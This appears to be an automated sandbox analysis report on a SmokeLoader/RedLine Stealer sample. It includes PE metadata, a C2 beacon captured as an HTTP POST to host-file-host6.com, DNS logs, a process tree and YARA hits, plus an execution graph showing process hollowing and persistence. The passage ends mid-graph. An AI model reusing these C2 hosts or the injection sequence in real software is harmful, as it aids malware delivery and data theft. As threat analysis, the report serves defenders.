                    mov dword ptr [ebp-24h], 00401348h
                    fld qword ptr [edi]
                    lea ecx, dword ptr [ebp-28h]
                    fstp qword ptr [ebp-20h]
                    push ecx
                    fld qword ptr [ebx]
                    fstp qword ptr [ebp+00h]
                    Programming Language:
                    • [C++] VS2008 build 21022
                    • [ASM] VS2008 build 21022
                    • [ C ] VS2008 build 21022
                    • [IMP] VS2005 build 50727
                    • [RES] VS2008 build 21022
                    • [LNK] VS2008 build 21022
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x173c40x3c.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x490000x1a510.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x640000xda4.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x11f00x1c.text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x49300x40.text
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x19c.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x16d560x16e00False0.5951054474043715data6.700639978901342IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .data0x180000x2e2040x2b200False0.4851675724637681data4.842680156477422IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .weme0x470000xbb80xc00False0.008138020833333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .hosetot0x480000x2700x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc0x490000x1a5100x1a600False0.6376629146919431data6.2449814680641245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x640000x1c120x1e00False0.3893229166666667data3.8827536368334243IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountry
                    AFX_DIALOG_LAYOUT0x614500x2dataSlovakSlovakia
                    AFX_DIALOG_LAYOUT0x614380x2dataSlovakSlovakia
                    AFX_DIALOG_LAYOUT0x614400xcdataSlovakSlovakia
                    SUXUMOWUDAKOLA0x5f2d00x2107ASCII text, with very long lines (8455), with no line terminatorsSlovakSlovakia
                    RT_CURSOR0x614580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                    RT_CURSOR0x623000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                    RT_CURSOR0x62bd00x130Device independent bitmap graphic, 32 x 64 x 1, image size 0SlovakSlovakia
                    RT_CURSOR0x62d000xb0Device independent bitmap graphic, 16 x 32 x 1, image size 0SlovakSlovakia
                    RT_ICON0x499900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SlovakSlovakia
                    RT_ICON0x4a0580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                    RT_ICON0x4c6000x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                    RT_ICON0x4ca980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                    RT_ICON0x4d9400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                    RT_ICON0x4e1e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                    RT_ICON0x4e7500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                    RT_ICON0x50cf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                    RT_ICON0x51da00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SlovakSlovakia
                    RT_ICON0x527280x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                    RT_ICON0x52bf80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                    RT_ICON0x53aa00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                    RT_ICON0x543480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SlovakSlovakia
                    RT_ICON0x54a100x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                    RT_ICON0x54f780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                    RT_ICON0x575200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                    RT_ICON0x585c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                    RT_ICON0x58a980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSlovakSlovakia
                    RT_ICON0x599400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSlovakSlovakia
                    RT_ICON0x5a1e80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSlovakSlovakia
                    RT_ICON0x5a8b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSlovakSlovakia
                    RT_ICON0x5ae180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SlovakSlovakia
                    RT_ICON0x5d3c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SlovakSlovakia
                    RT_ICON0x5e4680x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SlovakSlovakia
                    RT_ICON0x5edf00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SlovakSlovakia
                    RT_STRING0x62fc80x546dataSlovakSlovakia
                    RT_ACCELERATOR0x613d80x40dataSlovakSlovakia
                    RT_GROUP_CURSOR0x62ba80x22dataSlovakSlovakia
                    RT_GROUP_CURSOR0x62db00x22dataSlovakSlovakia
                    RT_GROUP_ICON0x58a300x68dataSlovakSlovakia
                    RT_GROUP_ICON0x4ca680x30dataSlovakSlovakia
                    RT_GROUP_ICON0x52b900x68dataSlovakSlovakia
                    RT_GROUP_ICON0x5f2580x76dataSlovakSlovakia
                    RT_VERSION0x62dd80x1f0MS Windows COFF PowerPC object fileSlovakSlovakia
                    None0x614180xadataSlovakSlovakia
                    None0x614280xadataSlovakSlovakia
                    DLLImport
                    KERNEL32.dllFillConsoleOutputCharacterA, GetCPInfo, GetProfileIntW, GetSystemDefaultLCID, GetModuleHandleW, WaitNamedPipeW, TlsSetValue, GetPriorityClass, GetVolumeInformationA, LoadLibraryW, IsProcessInJob, AssignProcessToJobObject, GetCalendarInfoW, GetFileAttributesA, TransactNamedPipe, WriteConsoleW, GetVolumePathNameA, CreateJobObjectA, GetVolumeNameForVolumeMountPointA, FillConsoleOutputCharacterW, GetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, SetFileAttributesA, LoadLibraryA, WriteConsoleA, GetProcessWorkingSetSize, LocalAlloc, OpenJobObjectW, FoldStringW, FoldStringA, FindFirstChangeNotificationA, GetFileInformationByHandle, FindActCtxSectionStringW, LCMapStringW, GetConsoleAliasesW, GetFullPathNameW, HeapFree, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapReAlloc, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlUnwind, SetHandleCount, GetFileType, GetStartupInfoA, SetFilePointer, TlsGetValue, TlsAlloc, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetConsoleOutputCP, MultiByteToWideChar, SetStdHandle, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA, GetModuleHandleA, HeapSize, GetLocaleInfoA, LCMapStringA, GetStringTypeA, GetStringTypeW, SetEndOfFile, GetProcessHeap, ReadFile
                    ADVAPI32.dllBackupEventLogW
                    Language of compilation systemCountry where language is spokenMap
                    SlovakSlovakia
                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    192.168.2.584.21.172.15949704802851815 12/09/22-10:55:01.226456TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184970480192.168.2.584.21.172.159
                    TimestampSource PortDest PortSource IPDest IP
                    Dec 9, 2022 10:55:01.199026108 CET4970480192.168.2.584.21.172.159
                    Dec 9, 2022 10:55:01.226083994 CET804970484.21.172.159192.168.2.5
                    Dec 9, 2022 10:55:01.226320982 CET4970480192.168.2.584.21.172.159
                    Dec 9, 2022 10:55:01.226455927 CET4970480192.168.2.584.21.172.159
                    Dec 9, 2022 10:55:01.226455927 CET4970480192.168.2.584.21.172.159
                    Dec 9, 2022 10:55:01.253685951 CET804970484.21.172.159192.168.2.5
                    Dec 9, 2022 10:55:01.344106913 CET804970484.21.172.159192.168.2.5
                    Dec 9, 2022 10:55:01.344264030 CET4970480192.168.2.584.21.172.159
                    Dec 9, 2022 10:55:01.347003937 CET4970480192.168.2.584.21.172.159
                    Dec 9, 2022 10:55:01.374615908 CET804970484.21.172.159192.168.2.5
                    TimestampSource PortDest PortSource IPDest IP
                    Dec 9, 2022 10:55:00.849432945 CET4917753192.168.2.58.8.8.8
                    Dec 9, 2022 10:55:01.192933083 CET53491778.8.8.8192.168.2.5
                    Dec 9, 2022 10:55:01.355135918 CET4972453192.168.2.58.8.8.8
                    Dec 9, 2022 10:55:02.354784966 CET4972453192.168.2.58.8.8.8
                    Dec 9, 2022 10:55:03.370491982 CET4972453192.168.2.58.8.8.8
                    Dec 9, 2022 10:55:05.354854107 CET4972453192.168.2.58.8.8.8
                    Dec 9, 2022 10:55:05.385504961 CET53497248.8.8.8192.168.2.5
                    Dec 9, 2022 10:55:07.385929108 CET53497248.8.8.8192.168.2.5
                    Dec 9, 2022 10:55:07.398686886 CET53497248.8.8.8192.168.2.5
                    Dec 9, 2022 10:55:09.381998062 CET53497248.8.8.8192.168.2.5
                    TimestampSource IPDest IPChecksumCodeType
                    Dec 9, 2022 10:55:07.386039972 CET192.168.2.58.8.8.8cff8(Port unreachable)Destination Unreachable
                    Dec 9, 2022 10:55:09.382101059 CET192.168.2.58.8.8.8cff8(Port unreachable)Destination Unreachable
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Dec 9, 2022 10:55:00.849432945 CET192.168.2.58.8.8.80xed9cStandard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                    Dec 9, 2022 10:55:01.355135918 CET192.168.2.58.8.8.80x1589Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                    Dec 9, 2022 10:55:02.354784966 CET192.168.2.58.8.8.80x1589Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                    Dec 9, 2022 10:55:03.370491982 CET192.168.2.58.8.8.80x1589Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                    Dec 9, 2022 10:55:05.354854107 CET192.168.2.58.8.8.80x1589Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Dec 9, 2022 10:55:01.192933083 CET8.8.8.8192.168.2.50xed9cNo error (0)host-file-host6.com84.21.172.159A (IP address)IN (0x0001)false
                    Dec 9, 2022 10:55:05.385504961 CET8.8.8.8192.168.2.50x1589Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                    Dec 9, 2022 10:55:07.385929108 CET8.8.8.8192.168.2.50x1589Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                    Dec 9, 2022 10:55:07.398686886 CET8.8.8.8192.168.2.50x1589Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                    Dec 9, 2022 10:55:09.381998062 CET8.8.8.8192.168.2.50x1589Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                    • quargeql.com
                      • host-file-host6.com
                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.54970484.21.172.15980C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Dec 9, 2022 10:55:01.226455927 CET24OUTPOST / HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://quargeql.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 158
                    Host: host-file-host6.com
                    Dec 9, 2022 10:55:01.226455927 CET25OUTData Raw: 10 87 83 93 6c f2 a1 c0 cc 3b 7d 31 79 cb e1 88 37 63 ab 32 d7 45 6f 91 cd 9c de ff f8 a4 92 8b 1a c6 5c a4 6f 1c c8 96 ea a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd ce f0 d8 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 32 ad ae 6a
                    Data Ascii: l;}1y7c2Eo\owmwu$f]d2j@brk{K1_51mC3q.p}GO^:<$8,/@uy9V<|
                    Dec 9, 2022 10:55:01.344106913 CET25INHTTP/1.1 200 OK
                    Server: nginx/1.20.2
                    Date: Fri, 09 Dec 2022 09:55:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: fYour IP blocked0


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:10:54:00
                    Start date:09/12/2022
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\file.exe
                    Imagebase:0x400000
                    File size:391168 bytes
                    MD5 hash:6B8486D9065FB3105E8C8A14C58DD0ED
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.305126000.0000000000603000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    Reputation:low

                    Target ID:1
                    Start time:10:54:05
                    Start date:09/12/2022
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\file.exe
                    Imagebase:0x400000
                    File size:391168 bytes
                    MD5 hash:6B8486D9065FB3105E8C8A14C58DD0ED
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.389552753.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.389552753.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.389415953.0000000000580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.389415953.0000000000580000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:low

                    Target ID:2
                    Start time:10:54:11
                    Start date:09/12/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff69bc80000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000000.377043487.0000000002971000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000000.377043487.0000000002971000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high

                    Target ID:5
                    Start time:10:55:00
                    Start date:09/12/2022
                    Path:C:\Users\user\AppData\Roaming\dubewge
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\dubewge
                    Imagebase:0x400000
                    File size:391168 bytes
                    MD5 hash:6B8486D9065FB3105E8C8A14C58DD0ED
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.437430133.0000000000492000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:6
                    Start time:10:55:06
                    Start date:09/12/2022
                    Path:C:\Users\user\AppData\Roaming\dubewge
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\dubewge
                    Imagebase:0x400000
                    File size:391168 bytes
                    MD5 hash:6B8486D9065FB3105E8C8A14C58DD0ED
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.453507425.0000000000460000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.453507425.0000000000460000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.453701840.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.453701840.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:low

                    Reset < >

                      Execution Graph

                      Execution Coverage:7.7%
                      Dynamic/Decrypted Code Coverage:3.1%
                      Signature Coverage:6.4%
                      Total number of Nodes:1670
                      Total number of Limit Nodes:26
                      execution_graph 8811 490000 8814 490630 8811->8814 8813 490005 8815 49064c 8814->8815 8817 491577 8815->8817 8820 4905b0 8817->8820 8823 4905dc 8820->8823 8821 49061e 8822 4905e2 GetFileAttributesA 8822->8823 8823->8821 8823->8822 8825 490420 8823->8825 8826 4904f3 8825->8826 8827 4904fa 8826->8827 8828 4904ff CreateWindowExA 8826->8828 8827->8823 8828->8827 8829 490540 PostMessageA 8828->8829 8830 49055f 8829->8830 8830->8827 8832 490110 VirtualAlloc GetModuleFileNameA 8830->8832 8833 49017d CreateProcessA 8832->8833 8834 490414 8832->8834 8833->8834 8836 49025f VirtualFree VirtualAlloc GetThreadContext 8833->8836 8834->8830 8836->8834 8837 4902a9 ReadProcessMemory 8836->8837 8838 4902e5 VirtualAllocEx NtWriteVirtualMemory 8837->8838 8839 4902d5 NtUnmapViewOfSection 8837->8839 8840 49033b 8838->8840 8839->8838 8841 49039d WriteProcessMemory SetThreadContext ResumeThread 8840->8841 8842 490350 NtWriteVirtualMemory 8840->8842 8843 4903fb ExitProcess 8841->8843 8842->8840 8845 406f19 8882 408168 8845->8882 8847 406f25 GetStartupInfoW 8848 406f48 8847->8848 8883 4074c4 HeapCreate 8848->8883 8851 406f98 8885 40beb9 GetModuleHandleW 8851->8885 8855 406fa9 __RTC_Initialize 8919 40a6f1 8855->8919 8856 406ef0 _fast_error_exit 68 API calls 8856->8855 8858 406fb7 8859 406fc3 GetCommandLineW 8858->8859 8996 406be8 8858->8996 8934 40cb55 GetEnvironmentStringsW 8859->8934 8862 406fd2 8940 40caa7 GetModuleFileNameW 8862->8940 8865 406fdc 8866 406fe7 8865->8866 8867 406be8 __amsg_exit 68 API calls 8865->8867 8944 40c878 8866->8944 8867->8866 8870 406ff8 8957 406ca7 8870->8957 8871 406be8 __amsg_exit 68 API calls 8871->8870 8873 406fff 8874 406be8 __amsg_exit 68 API calls 8873->8874 8875 40700a __wwincmdln 8873->8875 8874->8875 8963 4058a1 8875->8963 8878 407039 9006 406e84 8878->9006 8881 40703e __close 8882->8847 8884 406f8c 8883->8884 8884->8851 8988 406ef0 8884->8988 8886 40bed4 8885->8886 8887 40becd 8885->8887 8889 40c03c 8886->8889 8890 40bede GetProcAddress GetProcAddress GetProcAddress GetProcAddress 8886->8890 9009 406bb8 8887->9009 9070 40bbd3 8889->9070 8892 40bf27 TlsAlloc 8890->8892 8895 406f9e 8892->8895 8896 40bf75 TlsSetValue 8892->8896 8895->8855 8895->8856 8896->8895 8897 40bf86 8896->8897 9013 406ea2 8897->9013 8902 40baa9 __encode_pointer 7 API calls 8903 40bfa6 8902->8903 8904 40baa9 __encode_pointer 7 API calls 8903->8904 8905 40bfb6 8904->8905 8906 40baa9 __encode_pointer 7 API calls 8905->8906 8907 40bfc6 8906->8907 9032 4074f4 8907->9032 8914 40bb24 __decode_pointer 6 API calls 8915 40c01a 8914->8915 8915->8889 8916 40c021 8915->8916 9052 40bc10 8916->9052 8918 40c029 GetCurrentThreadId 8918->8895 9398 408168 8919->9398 8921 40a6fd GetStartupInfoA 8922 40d6bc __calloc_crt 68 API calls 8921->8922 8928 40a71e 8922->8928 8923 40a93c __close 8923->8858 8924 40a8b9 GetStdHandle 8927 40a883 8924->8927 8925 40d6bc __calloc_crt 68 API calls 8925->8928 8926 40a91e SetHandleCount 8926->8923 8927->8923 8927->8924 8927->8926 8929 40a8cb GetFileType 8927->8929 8930 40c782 ___lock_fhandle InitializeCriticalSectionAndSpinCount 8927->8930 8928->8923 8928->8925 8928->8927 8933 40a806 8928->8933 8929->8927 8930->8927 8931 40a82f GetFileType 8931->8933 8932 40c782 ___lock_fhandle InitializeCriticalSectionAndSpinCount 8932->8933 8933->8923 8933->8927 8933->8931 8933->8932 8935 40cb66 8934->8935 8936 40cb6a 8934->8936 8935->8862 8937 40d677 __malloc_crt 68 API calls 8936->8937 8938 40cb8b _realloc 8937->8938 8939 40cb92 FreeEnvironmentStringsW 8938->8939 8939->8862 8941 40cadc _wparse_cmdline 8940->8941 8942 40d677 __malloc_crt 68 API calls 8941->8942 8943 40cb1f _wparse_cmdline 8941->8943 8942->8943 8943->8865 8945 40c890 _wcslen 8944->8945 8947 406fed 8944->8947 8946 40d6bc __calloc_crt 68 API calls 8945->8946 8950 40c8b4 _wcslen 8946->8950 8947->8870 8947->8871 8948 40c919 8949 40617d ___freetlocinfo 68 API calls 8948->8949 8949->8947 8950->8947 8950->8948 8951 40d6bc __calloc_crt 68 API calls 8950->8951 8952 40c93f 8950->8952 8955 40c8fe 8950->8955 9399 4112eb 8950->9399 8951->8950 8953 40617d ___freetlocinfo 68 API calls 8952->8953 8953->8947 8955->8950 8956 40973f __invoke_watson 10 API calls 8955->8956 8956->8955 8958 406cb5 __IsNonwritableInCurrentImage 8957->8958 9408 40c1d0 8958->9408 8960 406cd3 __initterm_e 8962 406cf2 __IsNonwritableInCurrentImage __initterm 8960->8962 9412 40c16d 8960->9412 8962->8873 8964 4058cb GetLastError TransactNamedPipe 8963->8964 8964->8964 8965 4058e1 8964->8965 8966 405f9a LoadLibraryA 8965->8966 8967 405ede WriteConsoleA IsProcessInJob GetPriorityClass 8965->8967 9512 404ec6 8966->9512 9536 406707 8967->9536 8970 405f0b 8972 40617d ___freetlocinfo 68 API calls 8970->8972 8973 405f26 8972->8973 8974 40625a _malloc 68 API calls 8973->8974 8975 405f2d 8974->8975 9559 406642 8975->9559 8977 405f40 9576 4065ef 8977->9576 8981 405f59 9597 406b33 8981->9597 8983 405f62 9610 404b2a 8983->9610 8987 405f77 8987->8966 8989 406f03 8988->8989 8990 406efe 8988->8990 8992 40835c __NMSG_WRITE 68 API calls 8989->8992 8991 408507 __FF_MSGBANNER 68 API calls 8990->8991 8991->8989 8993 406f0b 8992->8993 8994 406c3c _fast_error_exit 3 API calls 8993->8994 8995 406f15 8994->8995 8995->8851 8997 408507 __FF_MSGBANNER 68 API calls 8996->8997 8998 406bf2 8997->8998 8999 40835c __NMSG_WRITE 68 API calls 8998->8999 9000 406bfa 8999->9000 9001 40bb24 __decode_pointer 6 API calls 9000->9001 9002 406c05 9001->9002 9002->8859 9003 406e58 10735 406d2c 9003->10735 9005 406e69 9005->8878 9007 406d2c _doexit 68 API calls 9006->9007 9008 406e8f 9007->9008 9008->8881 9010 406bc3 Sleep GetModuleHandleW 9009->9010 9011 406be1 9010->9011 9012 406be5 9010->9012 9011->9010 9011->9012 9012->8886 9076 40bb1b 9013->9076 9015 406eaa __init_pointers __initp_misc_winsig 9079 40c3d1 9015->9079 9018 40baa9 __encode_pointer 7 API calls 9019 406ee6 9018->9019 9020 40baa9 TlsGetValue 9019->9020 9021 40bac1 9020->9021 9022 40bae2 GetModuleHandleW 9020->9022 9021->9022 9023 40bacb TlsGetValue 9021->9023 9024 40baf2 9022->9024 9025 40bafd GetProcAddress 9022->9025 9030 40bad6 9023->9030 9026 406bb8 __crt_waiting_on_module_handle 2 API calls 9024->9026 9031 40bada 9025->9031 9027 40baf8 9026->9027 9027->9025 9028 40bb15 9027->9028 9028->8902 9029 40bb0d RtlEncodePointer 9029->9028 9030->9022 9030->9031 9031->9028 9031->9029 9033 4074ff 9032->9033 9035 40752d 9033->9035 9082 40c782 9033->9082 9035->8889 9036 40bb24 TlsGetValue 9035->9036 9037 40bb3c 9036->9037 9038 40bb5d GetModuleHandleW 9036->9038 9037->9038 9041 40bb46 TlsGetValue 9037->9041 9039 40bb78 GetProcAddress 9038->9039 9040 40bb6d 9038->9040 9043 40bb55 9039->9043 9042 406bb8 __crt_waiting_on_module_handle 2 API calls 9040->9042 9045 40bb51 9041->9045 9044 40bb73 9042->9044 9043->8889 9046 40d6bc 9043->9046 9044->9039 9044->9043 9045->9038 9045->9043 9047 40d6c5 9046->9047 9049 40c000 9047->9049 9050 40d6e3 Sleep 9047->9050 9087 411374 9047->9087 9049->8889 9049->8914 9051 40d6f8 9050->9051 9051->9047 9051->9049 9377 408168 9052->9377 9054 40bc1c GetModuleHandleW 9055 40bc32 9054->9055 9056 40bc2c 9054->9056 9058 40bc4a GetProcAddress GetProcAddress 9055->9058 9059 40bc6e 9055->9059 9057 406bb8 __crt_waiting_on_module_handle 2 API calls 9056->9057 9057->9055 9058->9059 9060 407670 __lock 64 API calls 9059->9060 9061 40bc8d InterlockedIncrement 9060->9061 9378 40bce5 9061->9378 9064 407670 __lock 64 API calls 9065 40bcae 9064->9065 9381 40ef35 InterlockedIncrement 9065->9381 9067 40bccc 9393 40bcee 9067->9393 9069 40bcd9 __close 9069->8918 9071 40bbe9 9070->9071 9072 40bbdd 9070->9072 9074 40bc0b 9071->9074 9075 40bbfd TlsFree 9071->9075 9073 40bb24 __decode_pointer 6 API calls 9072->9073 9073->9071 9074->9074 9075->9074 9077 40baa9 __encode_pointer 7 API calls 9076->9077 9078 40bb22 9077->9078 9078->9015 9080 40baa9 __encode_pointer 7 API calls 9079->9080 9081 406edc 9080->9081 9081->9018 9086 408168 9082->9086 9084 40c78e InitializeCriticalSectionAndSpinCount 9085 40c7d2 __close 9084->9085 9085->9033 9086->9084 9088 411380 __close 9087->9088 9089 411398 9088->9089 9099 4113b7 _memset 9088->9099 9100 40747b 9089->9100 9093 411429 RtlAllocateHeap 9093->9099 9095 4113ad __close 9095->9047 9099->9093 9099->9095 9106 407670 9099->9106 9113 407e82 9099->9113 9119 411470 9099->9119 9122 40854f 9099->9122 9125 40bcf7 GetLastError 9100->9125 9102 407480 9103 409867 9102->9103 9104 40bb24 __decode_pointer 6 API calls 9103->9104 9105 409877 __invoke_watson 9104->9105 9107 407685 9106->9107 9108 407698 EnterCriticalSection 9106->9108 9172 4075ad 9107->9172 9108->9099 9110 40768b 9110->9108 9111 406be8 __amsg_exit 67 API calls 9110->9111 9112 407697 9111->9112 9112->9108 9114 407eb0 9113->9114 9116 407f52 9114->9116 9118 407f49 9114->9118 9365 4079e9 9114->9365 9116->9099 9118->9116 9372 407a99 9118->9372 9376 407596 LeaveCriticalSection 9119->9376 9121 411477 9121->9099 9123 40bb24 __decode_pointer 6 API calls 9122->9123 9124 40855f 9123->9124 9124->9099 9139 40bb9f TlsGetValue 9125->9139 9128 40bd64 SetLastError 9128->9102 9129 40d6bc __calloc_crt 65 API calls 9130 40bd22 9129->9130 9130->9128 9131 40bb24 __decode_pointer 6 API calls 9130->9131 9132 40bd3c 9131->9132 9133 40bd43 9132->9133 9134 40bd5b 9132->9134 9135 40bc10 __initptd 65 API calls 9133->9135 9144 40617d 9134->9144 9137 